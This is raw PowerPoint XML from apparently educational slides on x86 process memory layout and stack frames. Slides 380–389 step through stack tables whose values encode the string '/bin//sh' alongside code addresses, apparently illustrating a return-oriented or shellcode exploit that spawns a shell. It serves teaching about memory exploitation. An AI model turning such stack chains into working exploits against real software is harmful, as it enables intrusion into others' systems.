            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="17331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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="461517356"/>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0xbffff620</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179852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8398392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Memory Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130215" y="3375621"/>
            <a:ext cx="2331843" cy="2146091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">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3GB Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130215" y="2565357"/>
            <a:ext cx="2331843" cy="81026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1GB Kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020450" y="2074112"/>
            <a:ext cx="530915" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681943" y="5249450"/>
            <a:ext cx="1338828" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2941180" y="2552040"/>
            <a:ext cx="1189035" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xffffffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042507" y="3375620"/>
            <a:ext cx="1044517" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xbfffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2690960" y="3061035"/>
            <a:ext cx="1326004" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xc0000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55708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p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
    </p:bld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58438" y="4455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0xbffff62c</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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380</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="17331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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1503055250"/>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0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0xbffff620</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0x080541b2</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206794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1269328"/>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58438" y="4455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0xbffff62c</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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381</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="135951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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1172879162"/>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fi-FI">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0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0xbffff624</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128505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999447089"/>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58438" y="4455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0xbffff62c</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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382</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="135951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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="497961076"/>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fi-FI">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0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0xbffff624</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0x0809a67f</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154069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212279987"/>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58438" y="4455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0xbffff62c</a:t>
            </a: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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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383</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="96622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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1868704740"/>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fi-FI">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0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0xbffff628</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17939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488031973"/>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58438" y="44557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0xbffff62c</a:t>
            </a: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mr-IN"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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f</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0x080ea064</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0x6e69622f</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384</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6302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971290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="445429559"/>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fi-FI">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0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0xbffff62c</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0x0806e91b</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39223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372227805"/>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0xbffff62c</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0783642"/>
              </p:ext>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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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385</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="647010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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1269041446"/>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fi-FI">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0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0xbffff62c</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0x0806e91b</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39223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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1937359015"/>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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386</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="611614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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2008637191"/>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fi-FI">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0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0xbffff630</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724532"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148609806"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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387</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="576218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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442884895"/>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0xbffff634</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0x080bb6d7</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9724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722338297"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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388</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="537872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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1541354495"/>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0xbffff638</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128188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2097708600"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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389</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="537872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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146768918"/>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0xbffff638</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0x0809a67f</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152486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4497637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090" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Process Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment/Argument section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for environment data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for the command line data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for local parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for saving the processor status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory-mapping segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for shared libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for dynamically allocated data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data section (Static/global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initialized variables (.data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uninitialized variables (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code/Text section (.text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Marked read-only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modifications causes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>segfaults</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985092" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="5495261"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Code (.text)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985093" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="5209511"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Data (.data)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985094" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3175086"/>
            <a:ext cx="2590800" cy="507121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985095" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5105400" y="2317834"/>
            <a:ext cx="0" cy="342900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endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985096" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="2317834"/>
            <a:ext cx="0" cy="342900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endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985097" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3175085"/>
            <a:ext cx="2590800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
